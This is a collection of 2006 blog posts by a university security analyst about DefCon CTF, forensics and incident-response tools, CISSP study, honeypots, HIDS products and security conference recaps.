I'm not sure how I happened across the Ethical Hacker site, but there was a "skillz" challenge that had recently been posted by Ed Skoudis and Mike Poor of Intelguardians--both are SANS instructors. The challenge is called "Hack Bill!" and was a fun little story about how O-ren Ishii hacked Bill's server and took over a large botnet. There were going to be two winners based on their submission, one technically correct and one creative while still being technically correct. I chose to write mine in an effort to win the creative portion. Unfortunately, I didn't win, but if you have time, take a look at my submission compared to the winners above and let me know what you think.

DefCon Recap - 1@stplace Won!

2006-08-14T09:32:00.000-04:00

Most everyone has heard by now that 1@stplace won DefCon's Capture the Flag contest hosted by Kenshoto. Between the lack of sleep (from two small children) preceeding DefCon and then compounding that deficit while in Vegas, it has taken almost a week to get back in the groove.

So, how was the DefCon/CTF experience, check out this article in the Alligator student papoer and the Chronicle of Higher Education - Wire Campus had a nice writeup that made its way to the UF "CIO". His e-mail to us said, "Outstanding work – I hope this article does not invite people to try 8-)" Nice. ;-)

If you want to learn more, I think the overview by our teammate DocBrown is an excellent place to start. I'm very fortunate to have had the opportunity to participate with 1@stplace (@tlas, apu, drb, fury, plato, psifertex, wrffr). They are an outstanding group of guys. We all share a love of hacking (in some form) and now, we all have DefCon leather jackets and Black Badges!

Where to go from here? Well, I have several projects that I need to get out the door ASAP, there the PVR and file servers that I want to build at home and I'd like to rebuild the CTF as much as possible at home on virtual machines so that I can continue working on some ideas I had during the match and get my hands dirty with the reverse engineering parts.

Defcon 14 - Day 1

2006-08-04T14:09:00.000-04:00

Note: I will probably just add to the end of this entry as the day goes through.

So, I woke up every two hours throughout the night and was out of bed before 6am. Weird. If you know me, I don't like getting up early. Maybe it was the excitement of being here and participating in CTF.

Fast forward...I am now sitting here with l@stplace waiting for things to begin. Due to some issue that the local fire marshall had, everything is beginning an hour late. The Kenshoto guys just told the team leaders that we have to have an external modem so all the teams are sending people out to find modems. That explains why each team has two RJ-45 and one RJ-11 running to their areas.

UPDATE 11:06am: The announcement was just made that everything is going to be pushed back another hour.

DefCon 14 - I made it!

2006-08-04T01:53:00.000-04:00

After too many hours of scrunching my big shoulder in little airplane seats, I am finally about to crash in my hotel room at the Riviera. I'm not sure if I want to try and describe excitement and the energy around this place. It is by far one of the coolest experiences I've had.

I ran into @tlas and his CTF crew, 1@stPlace. After introductions, @tlas told me they were down a man and invited me to the join the team! How can I say no? I will be meeting them at 8:30 in the morning. Ugh.

Next, I ran into my friend, the British Bulldog, a former NYPD Computer Crimes guy and former Guidance Software trainer. We had a nice long chat about forensics and some upcoming plans at UF while enjoying 99cent Amberbock and foot long hot dogs.

So, after going through the trouble of putting all the talks I wanted to see into iCal and syncing it to my Treo, I might not be able to make it to most of them other than a couple of "must see"s. Here is my potential schedule for Day 1 and Day 2. They are graphics because I'm too tired to figure out how to export it in iCal for everyone to see. If I'm not in one of these talks, I'm at the CTF. ;-)

Live Incident Response Tools

2006-07-17T23:06:00.000-04:00

I replied to a post on the Security Focus "Forensics" mailing list today in response to someone asking about other "live incident response" tools like the one Matthew Shannon was pimping, Nigilant32. I'm gonna poke Matt a little because he is a fellow graduate from the University of Florida DIS program.

To quote the Nigilant32 site:

Nigilant32 is an incident response tool designed to capture as much information as possible from a running system with the smallest potential impact. Nigilant32 has been developed with Windows 2000, XP, and 2003 in mind, and should work fine with computers running one of those operating systems. Nigilant32 is beta software and may not work in all instances.

What is the point of this tool? What itch does it scratch that one of the tools below do not? Well, the only feature I tested--that is not included by a tool listed below--was the live preview allowing you to look at a filesystem on a live system. Would I ever use that functionality? No, I do not want to spend any more time on a live system than I have to when doing incident response. The likelihood of destroying evidence increased with every second that a system is running, and that likelihood increases substantially if you are moving the mouse around, running tools and "previewing disks."

Coincidentally, the fact he states "Nigilant32 is beta software and may not work in all instances" is very true. I found that when trying to preview a USB drive, the program completely crashed. In fact, the only drive I was able to preview was the C:\ drive. I'll have to go back and read the accompanying articles to see if this is a known problem. I'd also like to find out how the previewing is handled; for example, is it done on such a low level under the Windows API that the file access times are not modified?

I am going to try and make it to the InfraGard meeting in Jacksonville on Tuesday to listen to a forensics talk. I wonder if he will mention live response...if so, I will blog about it later.

For now, enjoy this list. If you know of any others or have experiences with these you'd like to share, let me know.

Forensic Server Project by Harlan Carvey
- http://windows-ir.com/fsp.html
- http://windowsir.blogspot.com/
- Written in Perl with compiled code for Windows. Can be cross
platform. Very customizable. Client/Server architecture

WFT (Window Forensic Toolchest) by Monty McDougal
- http://www.foolmoon.net/security/wft/
- Executable with config file. Very customizable. Windows only. Can
define rules for touching the drive, slow acquisitions or touch as
little as possible. Checksums tools before running.

First Response by Mandiant (Kevin Mandia's crew)
- http://www.mandiant.com/firstresponse.htm
- Client/server architecture. Windows only. Best if deployed within
organization prior to incident. Provides quick readability of info to
determine if incident has occurred so you can respond properly.

FRISK by John "Four" Flynn
- http://sourceforge.net/projects/frisk
- Window but could be cross platform. Written in Perl and uses Cygwin.
May not be actively developed anymore. Provides client/server if using
the included web server cgi.

It's Official: I am a CISSP

2006-07-14T14:54:00.000-04:00

I've finally done it! Well, the finally part is more to the fact that I took the exam on May 13, passed it and just finally sent in my resume almost TWO MONTHS later. I'm not sure why it took me so long to send it in. It could be that I didn't enjoy the whole CISSP process. In Feb, I attended SANS' CISSP prep class in Orlando. It was a good class, and I would probably think it helped me more if I had been able to take the test a week or two later, but I couldn't. The next availability in the area was almost two months after the prep class. When the exam was about two weeks away, I started taking practice exams every day until I was ready to barf CISSP material. Finally, when the test rolled around, I thought it was quite difficult...not because of the material, but because of the way the questions were asked. Now, I probably can't talk about it any further because of the "Fight Club" agreement I had to sign when taking the exam, but I can say I did not enjoy it at all, and the bad taste left in my mouth is probably why I didn't rush to send in my resume in order to complete the process.

I don't really want to complain about the whole process, but I am glad it is over, and I definitely have a feeling of accomplishment having done it. (Plus, it can't hurt to have on my resume;)

Zone Lab Blog on VA Laptop Forensics

2006-07-10T15:45:00.000-04:00

I had been wanting to post about this topic for a while but seem to get a little fired up whenever I think about it at length. So, instead of ranting, I thought I would simply post a link to a good write-up from Zone Labs. Take a look and let me know what you think.

Also, Jordan has a BUZZCUT that will be posted on Network Computing soon about the same topic. I haven't read it, yet, but I am sure it will be a worthwhile read.

Honeypots are not entrapment...usually.

2006-05-09T22:51:00.000-04:00

I was listening to one of my favorite podcasts, PaulDotCom Security Weekly (episode 26), where they were talking about an e-mail from reader who described a slick little honeypot that was created to catch students who were trying to break into systems. There were two machines running from bootable CD's and a shell script that logged into an Administrator account from one to the other every hour and a half. The machine getting logged into check at a particular interval to see who was logged in and gathered all relevant data if they were. Well, they busted a kid shortly after setting it up and he was expelled.

So, entrapment or not? Hell no! Why not?

Well, first, the sysadmin who implemented this solution is not law enforcement--this is an important detail in the definition of entrapment.

Second, the sysadmin did not trick the student into doing anything he wouldn't normally have done.

You say, "The student wouldn't normally have logged into that system." Bull crap! How did the student end up with the password? He sniffed it. Why was he sniffing the network? To break into a system. If it wasn't this system, it might have been a more important system that might have taken longer because that password sniffed on the wire would have been encrypted.

This is a beautiful example of how to use a honeypot. It provided low hanging fruit that prevented an attacker from getting into a critical system.

I say, "Bravo. Well done. And, you're wrong, Twitchy!" ;-)

To Forensicize or Not To Forensicize!

2006-05-01T22:43:00.000-04:00

If you don't listen to the PaulDotCom Security Weekly Podcast, then you may not be familiar with the term "forensicize" as defined by Twitchy. I recommend you start listening and begin developing your kung-fu!

I have had the pleasure of partipating in more cases requiring forensic analysis. This isn't common in most university environments. Why not? Well, I think it is primarily because most known compromises deal with student/staff/faculty desktops and laptops. Some underpaid university employee is tasked to figure out what is wrong so they run antivirus, antispyware, anti-whatever and finally realize the machine is too screwed up to do anything with so they reinstall Windows. OR, some wise administrator has decided that too much time has been wasted with figuring out why the systems are hosed up, so at the first sign of trouble, the OS is wiped and reinstalled via Ghost/RIS/etc.

So, what about the compromises that deal with servers or systems that could have sensitive information on them? Again, another unfortunate truth rears its ugly head--lack of knowledge of proper incident response and forensic procedures. I would guess that 90% of system administrators and support staff run McAfee or Symantec when they are told that a system may be compromised. Not only is that useless, but it could be damaging because the filesystem timeline is now destroyed. Now, ask each one of those administrators how to create a forensically sound copy of the hard drive or how to write-block a drive and all but 4-5% could answer it correctly (I am probably being generous with those numbers).

This really isn't where I was planning on going with this posting but my frustrations slowly creeped to the surface as I was writing. You can expect more and more on the topic of forensics as I get closer to my talk for the GatorLUG this month and start writing detailed forensics procedures for our university.

No more worms in my Apple...

2006-05-01T22:29:00.000-04:00

What a cheesy title!?! About a month ago, my laptop developed a horizontal line across the LCD display. I can't even begin to tell you how disappointed I was when I opened up my PowerBook to find the line. Thankfully, a quick call to Apple Support, and they had a shipping box delivered to my office the following day. Unfortunately, my PowerBook has become my primary desktop and mobile machine for everything--meeting notes, e-mail, documents, etc. Our OPS programmer recently left, so I was able to confiscate his old desktop, install Ubuntu and get a working machine for the interim while my laptop was away being repaired.

What about my sensitive data? During the phone call with Apple Support, the guy asked for my administrative password--I said, "No." He then asked if I would create a user with administrative rights with a certain user name and password--I said, "Sure." Before shipping it off, I backed up all my data to an external firewire drive, deleted my user account and home folder, then ran "dd if=/dev/urandom of=./random.dd bs=1024k count=7000000" in order to "wipe" my data on the remaining part of the hard drive.

Today, I received my laptop back with a beautiful new LCD. I logged in, recreated my account, copied the contents from the backup, "chown"ed it back to jsawyer:jsawyer and then deleted the temp account. Everything works fantastic, and I am happily productive once again.

Google Mac OS X Widgets

2006-05-01T21:51:00.000-04:00

I am always looking for a better, more efficient way to enable me to blog more often. Last week, I came across Google Mac Dashboard Widgets. There are three: Blogger, GMail and Search History. Check them out!

Note: This post was done via the Widget. It is definitely a quick and easy way to blog via Blogger, but it doesn't allow any advanced editing. Hopefully, they will add advanced editing in upcoming versions.

Host Intrusion Detection Systems (HIDS)

2006-04-28T00:48:00.000-04:00

When you say Intrusion Detection Systems or IDS, people immediately think of network-based IDS--very few think of Host Intrusion Detection Systems or HIDS. Jordan was preparing a presentation on IDS for a DIS graduate class. He was looking for the history of IDS and found several early papers on HIDS. Apparently, "back in the day," those individuals looking into IDS starting thinking of it from the host perspective. So, what happened? Why did everyone move their focus to the network by developing NIDS? My guess is someone was looking for the best bang for the buck by developing a solution that would cover as many hosts as possible instead of just one. So, NIDS lived and HIDS fell by the wayside.

Enough of my rambling intro...the whole point of this entry was to discuss a couple of HIDS products and a tool for breaking them that was updated to coincide with CanSecWest. I did not go to CanSecWest, but Jordan did and so did one of the smart guys from nCircle who posted his notes from all the presentations on their blog--definitely check it out their blog and excellent write-up of CanSecWest.

I was planning on running through a demo of slipfest running within CoreForce and WehnTrust with screenshots but time has gotten away from me--thanks to 3 hrs on the phone troubleshooting a problem on my mom's laptop--so it will have to wait until this weekend. To wet your appetite, check out the descriptions from the products' websites below.

WehnTrust is a Host-based Intrusion Prevention System (HIPS) that provides secure buffer overflow exploitation countermeasures. While other Windows based intrusion prevention systems are only capable of working with a pre-defined group of applications, WehnTrust's technology allows it to work with virtually all software products. Perhaps best of all, WehnTrust is currently free for home use.

CORE FORCE can be used to:

Protect your computer from compromises by worms, virus and email-borne malware
Prevent your computer from being used as a staging point to amplify attacks and compromise others
Prevent exploitation of known bugs in the operating system and applications running on your computer
Prevent exploitation of unknown bugs (0-day) in the operating system and applications running on your computer
Detect and prevent execution of adware, spyware, trojan horses and other malware on you computer

CORE FORCE provides inbound and outbound stateful packet filtering for TCP/IP protocols using a Windows port of OpenBSD's PF firewall, granular file system and registry access control and programs' integrity validation. These capabilities can be configured and enforced system-wide or on a per-application basis for specific programs such as email readers, Web browsers, media players, messaging software, etc.

Officially SLIPFEST is an acronym for "System level intrusion prevention system evaluation suite and toolkit". But the name is really a french joke meaning something like "Panty's party".

It's a tool which can help you to understand how your Windows HIPS (or personal firewall, or advanced anti-virus) works. With it you can list SDT (in kernel) or userland (in library) hooks, caracterize address space layout randomization (ASLR) or non executability, inject shellcodes in a process' address space to try to fool the heuristic or test the MAC mecanism with common flaws.

The Latest Happenings...

2006-04-26T22:20:00.000-04:00

Work has been busy lately. You might think that or you might just think I have been slacking since its been a month since my last post. Definitely not the latter--having a pregnant wife and 10 month old daughter require reprioritizing of my time. ;-) I also had food poisoning that put me out of commission for days, but I recuperated nicely on a 8 night Western Caribbean cruise the following week.

At work, I have finally had the chance to start flexing my forensic muscle. I really do enjoy forensics but never quite get the chance to do full analysis of a box including filesystem timelines, event logs, flow data, etc. The last three weeks have been exciting in this arena. I will be analyzing one, maybe two, hosts tomorrow.

I will be speaking on Open Source forensics at the May GatorLUG meeting. That should be fun. Right now, I am trying to decide if I want to use PowerPoint or Keynote. I thought about using OpenOffice Impress but I am thinking all the shiny effects of Keynote is what I really want. It will detract from the Open Source tools a bit but people will get over it.

And finally...why don't I update my blog or write those cool how to's or other things I have said I wanted to do on this site? Well, I am a bit of a perfectionist. When I think about putting content up here, I don't want to put it up unless I am perfectly happy with it and feel that it is "perfect." After speaking with a coworker about my tendency to act this way, she mentioned it was something she has read about in self-help books and it just leads people to never get things done. I want to overcome that so expect to see daily posts, perfect or not.

RSS Readers Dueling It Out on My PowerBook

2006-03-17T17:14:00.000-05:00

I started researching free RSS readers several months ago after finding it to be too time consuming visiting such a large list of bookmarks in Firefox. Sure, Firefox has Live Bookmarks, but have you used them? I personally think they suck a bit. So, the RSS reader search began. I found quite a few commercial apps but I really didn't want to pay anything for something that is essentially an XML parser/aggregator.

After trying about a half dozen, I stuck with Pulp Fiction Lite for about 4-6 months--hard to say just how long without looking at timestamps on the files. It is a good, slightly crippled version of their commercial product. Unfortunately, even though it was the best of those I tested, I wasn't in love with it.

Recently, I came across Vienna which is a free, Open Source RSS reader for Mac OS X. With the exception of Microsoft Office, I prefer running Open Source software. Vienna has been quit functional and more user friendly than Pulp Fiction Lite. It does seem to be a little more picky about the RSS feed being fully compliant with RSS standards as a couple of my feeds have been reported as bad. Going back to the source of the feed, I was able to try one of the other versions (RSS .9, 1.0, 2.0, ATOM, etc) and got past the problem. To help solve the problems with the feeds, it has an option to Validate Feed, which sends the feed to the Feed Validator website.

Vienna has quite a few features that I haven't even delved into yet but I expect to get around to them. They include Groups, Smart Folders and Custom Styles. A very cool app, indeed. If you like freeware, Open Source apps and need a solid RSS reader, check it Vienna.

Centralized Logging for Windows Using Syslog

2006-03-16T13:30:00.000-05:00

I posted the following information on a couple of different blogs several months ago. Since it has a link that I reference regularly, I decided to add it here to keep handy next time I mention it.

Syslog Server: If you choose not to implement a syslog server on a *nix platform, I highly recommend Kiwi Syslog Daemon. There is a free version that should fit most shop's needs and a commercial version for more advanced setups.

Event Log to Syslog: The Snare Agent is hands-down the best event log to syslog tool out there. It is FREE and supports all Event Logs including Security, Application, System, DNS and AD.

Microsoft Solutions: Microsoft Operations Management (MOM) includes that ability to collect all the logs from servers it monitors but is quite expensive if thats all you want to do. The vaporware Microsoft Audit Collecton System (MACS) is supposed to have an agent on each server that forwards all the logs back to a cenitral MACS server and stores everything in SQL. Keep holding your breath for that one.

Microsoft Security Monitoring and Attack Detection Planning Guide is a superb guide for learning what and what not to monitor in a Windows environment. The most useful part of the guide is Appendix A - Exclude Unnecessary Events to help trim down to the events that deserve a monkey's precious attention.

Die Virtual PC, rise VMware on a Mac (via SSH)

2006-03-16T12:48:00.000-05:00

Several weeks ago, I installed X11 on my PowerBook so I could run Ethereal. About a week after that, I trying tunneling the VMware Console over SSH into X. The console flashed a couple of times on the screen and promptly died. I tried several more times with no luck. A Google search did not turn up anything at the time. Frustration set in...

Today, while in a Windows Vista TAP meeting (don't ask), Jordan asked if I had tried tunneling the console over SSH, I replied yes, shortly thereafter, he sent me the following link to "How To Run vmware-console Remotely With Apple's X11" at the Tao of Mac site. I SSHed into my VMware server, added the xkeymap entry into my preferences file in the .vmware folder, ran vmware-console and BOOM!, there was VMware Console running in all its glory on my PowerBook. YES! I am a happy guy now.

DIE VIRTUAL PC! May you rot in peace. Long live VMware!

FrSIRT sells out!

2006-03-15T12:01:00.000-05:00

Any security person (or even script kiddie) knows the name K-otic. K-otic has been the source of top notch Proof of Concept (PoC) code and exploits for quite some time. Last year, I think, is when they transitioned to a business mindset of becoming FrSIRT, the French Security Incident Response Team, and started selling vulnerability announcement services. They continued putting out exploit code that typically made its way into Metasploit very quickly.

It all ends today...unless you are customer of their VNS--Vulnerability Notification Service--you don't get squat anymore. Their website doesn't even list the pricing for their product, however, I may end up getting curious enough to give them a call or shoot them an e-mail. Either way, I am really disappointed. It was a great and well-used resource by many security professionals.

Were they like Tenable and didn't feel they were getting enough back from what they put out? Who knows. They just have a crappy little page up where the Exploits page once existed that says:

Exploits and PoCs are available to FrSIRT VNS™ subscribers only.
Public exploits section have been definitively closed.

Oh well, thanks for the good times. If anyone has a mirror of all of their code, let me know ASAP!

UPDATE 9:08pm EST: My RSS reader just notified me there was a new article at FrSIRT, so I clicked on it to simply find that someone who knows the english language better has finally updated the text to read "Public exploits sections has been definitively closed." Damn. And here I thought they saw the error of their ways and changed their mind. I guess not. Someone on the FunSec mailing list posted that them closing the section wasn't a big deal as they just took the code from milw0rm. SMACK!!

SANS 2006 - CISSP - Final Thoughts

2006-03-08T09:59:00.000-05:00

After being in class for approximately 72 hrs in 6 days, I am a little burned out. The class was excellent. It really gave me an appreciation for security management. The CISSP certification is certainly designed for managers although industry and HR personnel don't seem to realize this. The more interesting parts were dealing with policy and cryptography. I really didn't know too much about cryptography before taking the class, but after a full day of it, I can say I have a good grasp on the subject. As for policy, I used to seriously dislike anything related to policy, especially, meetings that dealt with the semantics of policy. Looking at it from a managerial standpoint, it is crucial to the inner workings, efficiency and effectiveness of an IT organization. I look forward to actively participating in policy committees in the future.

I was able to attend several technical sessions during lunch and after class in the evenings. The majority of them were top-notch. I really enjoyed Joe Stewart's presentation on his tool TRUMAN for creating sandnets to accomplish behavioral malware analysis. Great presentation and I look forward to implementing this in the lab for our own testing. I also made contacts with numerous vendors regarding current work projects.

Overall, it was a fantastic, but exhausting experience. If Dr. Eric Cole had not been the instructor, I'm not sure I could have made it through. He is one of the best instructors I have had. Now, I need to continue studying and pass the CISSP exam in April.

SANS 2006 - CISSP 10 Domains class

2006-03-01T16:54:00.000-05:00

What a week!?! I have been in class since Sat at 9am. Each has covered 1-2 Domains from the CISSP. Class was 9am-7pm Sat, 8am-7pm Sun-Wed and 8am-5pm Thurs. Only one day left.

There has been a lot going on in addition to the normal class. There was a Vendor Expo where vendors from all corners of the IT security market came out of the woodwork. It was cool seeing some of the ones who I have reviewed their products for NWC or SE. There was even one who I will be reviewing in the next month.

Each night has had at least on Keynote which was sometimes good, sometimes just OK. Essentially, it boils down to me being in Learning Mode for about a full 13 hrs a day.

One surprising thing is how many people are here that I know. It is pretty interesting. There is the SANS faculty and staff that I know, but I am referring to a couple of attendees from other conferences I have met before, someone from FDLE and several people from the FL Dept of Health. Very cool. It has been nice catching up.

It has also been great having "expert" sources to ask questions. I still have a couple of stumpers for some of the big name people. I hope they have good answers as I haven't found info anywhere else. I will keep you posted.

More to follow...

Not running as an administrator

2006-02-21T10:33:00.000-05:00

I was IMing back and forth with a friend who is still in school. He was looking for a topic for a infosec related class so I pointed him toward LUA--Least-privileged User Account. He liked it so today, we were chatting again about the topic and how to quantify it. Below is my side of the conversation where he first asked if we had graphs or similar regarind the compromise resulting from administrators not enforcing LUA in their dept.

- We can't quantify it that well because the attacks are user initiated and not network initiated like an IDS would normally pick up.

- There are vulnerabilities that exist in Web browser, e-mail clients, RSS readers and IM clients that can be exploited simply by the user opening a link, reading an e-mail or accepting an IM. If the user does not have administrator privileges, the damage caused by those vulnerabilities exploited is greatly contained to just their user account. It is much easier to recreate a user account than to rebuild a system.

- Services are a completely separate issue. A user logged in usually does not interact directly with services running on their computer. The services start up automatically in as SYSTEM or some other user and work independently of the user. Today's attacks are targeting client applications more and more. If you go back through the Microsoft vulnerabilities, you will see patches for things that exploit the system because of something the user does like opening a bad WMF file. There have not been many remote service exploits on Windows lately.

- For example, "To continue browsing this website, you must install this software. By doing so, you agree to....blah, blah, blah." Hmm. I don't need to read that crap. I just need to click yes so I can keep browsing.

Here is a great blog post that correlates how adware/spyware affected a system where a user was an administrate and then as LUA. I did this same testing when I was at IFAS with the same results. It isn't rocket science people. Get a clue!!

Quick Update: SANS/CISSP, Articles and Personal Projects

2006-02-21T00:17:00.000-05:00

So many things going on...where to start. Well, first of all, I will be at the SANS conference all next week in Orlando in the CISSP track. To some of you, it may seem odd to be taking a CISSP class from SANS, but it was convenient as it is in Orlando and I had $3000 in tuition credit so it's only costing $95. Makes sense, now, doesn't it? ;-) Several coworkers and security professional friends keep telling me I could simply take the test and pass it but I prefer to go to the review just to be safe. I like sure things! Especially, when the dang test costs $500.

I just finished a "Deploying EFS in the Enterprise" for Security Enterprise magazine to be published in the March issue. It was a short two pages that ended up being a pretty good learning experience. I knew most of the limitations and features of EFS going into the article and picked up a bit of new knowledge in the process. The January issue had my review of Arbor Networks Peakflow X and the March issue will also have my review of Credan't Mobile Guardian 5.1 Enterprise Edition. An upcoming issue of Network Computing magazine will also have my review of PacketMotion's PacketSentry.

I have been posting pretty regularly in the ForensicFocus' Forums over the last couple of weeks. I will probably be copy some of the content of those posts over here. The posts were good and had some excellent information that would be useful here, and I would like to elaborate on them a bit.

Foremost and Scalpel don't have extensive patterns included in their config files so I am going to slowly begin collecting and testing patterns. Eventually, I want to have an extensive reference that will become a good online reference for forensic analysts using both tools.

I keep a list of "articles" that I want to work on and post on the blog in a PDF format. The list is quite ambitious and the magazine articles have pushed them to the backburner but I expect a lull in the magazine world for the next couple of weeks so I hope to make some headway with those personal articles.

nubuntu: this is a link as a reminder for a potential future project.

Be Careful What You Say...It Might End Up Online!

2006-01-14T19:52:00.000-05:00

At the DoD conference, I met a fellow named Paul F. Roberts who is a Senior Editor with eWeek. Jordan and I chatted with him for a while in the Expo Hall while killing time waiting for the Floppy Disk Throw. During the chat, we talked about the Mac OS X Forensics class I was in along with other presentations that either Jordan or I had attended. He showed interest in the Mac class and our experiences with them at work. Paul never mentioned he might included any of this in an article but I guess we should have expected it since he was "covering" the event.

I was taking a break from my article writing and thought I might check out the eWeek site to see what kind of stuff Paul writes. A quick search for his name revealed a slew of articles written by Paul. At the time, the latest one was titled, "Gov't Cyber-sleuths Focusing on Linux, iPod, Xbox" so I clicked it wanting to see what Paul thought about the conference. I never expected to see our names mentioned, but there we were.

Nothing really worth noting, although I would have liked to see more in-depth and insightful quotes than the ones included since they were a bit vague. For example, the Apple PowerBook I use was purchased by UF so that I could learn more about forensics and incident response on the Mac OS X platform. Very true, however, it isn't really for the entire staff to learn from since it is my primary workstation that travels everywhere with me. As for Jordan's quote, he can address that if he wants. I won't put words into his mouth.

Moral of the story...if you don't want it said in an article, don't say it in front of a reporter. Thankfully, we didn't say anything bad, but it would have been nice to know that we might be quoted. It is something I will certainly remember in the future. Paul, if you're reading this, it was great meeting you and thanks for the Corona.

DoD - Day 6 - The End...

2006-01-14T17:23:00.000-05:00

Day 6 - 01/13/2006: It is Friday the 13th and the final day of the Department of Defense Cybercrime Conference 2006. I admit that I am sad to see it end. Unlike most people I know, I truly love coming to conferences like this one where I am immersed into a learning environment and subjected to highly technical topics that I am interested in. It is fantastic. There were some presenations that were disspointing, but overall, it was worth every minute of my time.

The day started out early since I had to load up my junk because room checkout was around 11am when I would be in a presenation. After loading up, I headed over to Inverness Hall for breakfast and the "conference wrap-up." Nice things were said about everyone who participated and presented. Jordan and I won First Place in the Cipher Hunt challenge. Now that I think about it, I wish I had a copy of our challenges. Oh well. We received First Place medals in the DoD Cybercrime Olympics 2006 along with USB Aquariums. I received two nice certificates; a generic one for attending the conference and a very nice one for completing the 2 day Mac OS X Forensics class. Those were bonuses I wasn't expecting.

The first presentation of the day was "Identity Theft" by Kevin Mandia. Kevin is an awesome speaker. I was really impressed by his "stage presence" and comfort with the material. He went through a case study of a woman who had $50,000 stolen from her accounts which was later determined to have been accomplished by exploiting Internet Explorer on her computer and installing a keylogger. Great intro to people who don't do incident response and know the associated tools.

The second and last presenation focused on BitTorrent and forensics. It was quite and interesting topic. One of the dilemmas mentioned deals with how do investigators tracking down child porn deal with the issued of forced sharing when they are trying to download and verify potential child porn images. As soon as the investigator finishes downloading a file chunk, it is automatically shared out to others making the investigator a distributor of child porn. It raised several questions that I would like to research later on and possibly provide some help to the author and law enforcement (forensic) community.

I am now hanging out at my sister-in-law's house working on an article with a looming deadline but wanted to get in my last conference update. It was a great experience. I loved meeting all of the interesting people and look forward to keeping in touch with them. I am already anticipating next year's conference. Thanks to DoD, JTF-GNO & Technology Forums.

DoD - Day 5 Update

2006-01-12T19:24:00.000-05:00

Day 5 - 01/12/2006: Today may have been the least exciting day so far. I expected more from several of the presentations I attended. There were several cool people that I met and hung out with which makes up for the mediocre day. It started out with an early breakfast where I sat with some of the Air Force OSI guys, a Marine JAG fellow and a Naval Post Graduate School sysadmin. Very cool people.

The first presentation must have been specifically for law enforcement folks since it wasn't overly technical. Nothing wrong with that, but the title of "Hacking and Forensic Analysis of an iPod" made me expect more. The presentation briefly went over the partition structure of iPods, the directory structure, "hiding" files on it and using to boot Linux from an iPod. I know many others in the class got lots from it so I won't knock it. It just wasn't technical enough for me.

My second choice was a presentation by a lawyer from the JTF-GNO about the rights of system administrators to provide info to law enforcement and what info can be given. It was definitely interesting and raised a few questions I have for the university environment. Not much more that I can say about this one. I do need to review the slides as he did not go over all of them. Great information and excellent speaker.

The third presentation was by Thane Erickson who taught part of the Mac OS X forensics class I was in earlier. He was focusing specifically on Tiger things that were different and/or not covered in the previous class that was mainly on Panther. I learned about the difference in how passwords were hashed between Panther and Tiger, how to crack them, details about Spotlight and associated commandline tools and Dashboard Widgets with their associated forensic value. Excellent stuff. Thane is a good presenter and knows his stuff well. If you ever see him, make sure you tell him that LSU SUCKS!!!

Next, I went to a talk titled, "Daubert Digital Forensics." Since I am not LE, this presentation was just something I thought I might learn more about. I did take a few notes but did not find it overly interesting. Right now, I bet you are thinking, "Duh, it is legal stuff. Of course, it isn't interesting." Well, you have a point, but one day, it might be something I have to adhere to...but not yet.

After lunch with the FDLE boys, I thought "Digital Crime Scene Reconstruction" would be good with Fred Cohen. Hmmm...other people enjoyed it more than I did. His talk did a good job of validating the Daubert talk but his constant joking and goofiness turned me off. During the presentation, I ended up designing a future hacking challenge network layout for UF where I will set it up and challenge all L33T hackers at UF to penetrate. It should be fun.

My next choice was another bust. How did I keep choosing crappy presentations? It was Johnny Long presenting "Death by a 1000 Cuts." How could it be lame? Have you read "Stealing the Network: How to Own an Identity?" If yes, then don't go to this presentation. It is a rehash of one of the chapters and not very exciting. I really disappointed I chose it over Kevin Mandia's "Windows Malware Analysis" presentation. Johnny did get done 15 minutes early, so I was able to catch the last bit of Kevin's presentation which pissed me off even more that I chose the wrong presentation. I think by going to Kevin's "Identity Theft" presentation tomorrow, it will make up for it.

Finally, I caught the last hour of Bill Harback's "Examining the Windows Registry." It was FULL of windows registry information. Holy Crap! Bill went through so much in that hour, I would have had registry coming out of my ears if I had been there for both hours. Afterwards, he gave us updated copies of his presentation along with a free version of a registry tool that was recently purchased by a decently well known forensic tool company.

That's it for Thursday. The presentations I chose to attend certainly did not turn out as I hoped. Tomorrow will be better, especially since Jordan and I will be getting awards for kicking @$$ in the DoD Cybercrime Olympics. Now, I think I am going to drive over to Wing House or Hooters and work on an article for Secure Enterprise magazine that is due next week.

DoD - Day 4 Update

2006-01-11T22:38:00.000-05:00

Day 4 - 01/11/2006: Today was a good day. Well, other than the fact that Jordan was stuck in our hotel room all day sick, today was definitely a good day for listening to excellent speakers. This morning started off with a Google hacking presentation from Johnny Long. It was a good presentation and pretty much a rehash of the related book, yet still entertaining.

Next, I sat through two 2 hr presentations by Richard Beijtlich from Tao Security. Most people know him from from his extremely popular blog. Richard is a smart guy when it comes to network monitoring and incident response. To top things off, he is a fantastic speaker. His first presentation was on Network Incident Response and went through his standard incident response procedures. One issue he drove home with me was to not tip your hand when responding to an incident. Many times when I am incident handling, I will download the same tools that the attacker used which could easy alert them that I am tracking them if I download from a server they have compromised. There are two sides to the logic there but if there is a risk the attacker might do more damage because they know I am aware of them, they may retaliate. He also had some good ideas of how to implement a logging only server and incident response in general.

Richard's next presentation focused more specifically on forensics from a network perspective. He had some interesting thoughts on creating a ring-buffer type of full packet network logger that simply sits and records all network data in 1gb chunks and overwriting the oldest chunks. Applying the theory of computer forensics to network forensics, he reiterated several times that the key to successful investigations and prosecuting is developing a sound methodology and sticking to it every time. Most of the interesting examples and ideas can be found on his blog as he has posted them at some point in the past. I am glad I made it to both.

The fourth presentation was Xbox Forensic Analysis. No joke...it was a real presentation. Xboxes are beginning to show up more on forensic analysts' desks as they become used for more and more things. Someone playing a game online could be approaching an underage minor or they could have modded their Xbox so they can view illegal photos and videos. It was some interesting stuff. All in all, it makes me want to mod my Xbox even more. Since I have one that appears to have a bad BIOS, it needs to be replaced anyways...what better time to mod it. :-)

The last presentation was on something Jordan and I will be putting together soon at work. Creating a database and web frontend to hashsets. The idea is that known good and bad files can have hashes created and stored in a database. When investigating an incident, hashes from the filesystem can be compared to the database rule out files that are known good, identify those known bads and single out any odd ones not in either group. The whole point is data reduction so that more time can be focused on analyzing suspicious files than what is normally spent on identifying them. We think it is a rocking idea.

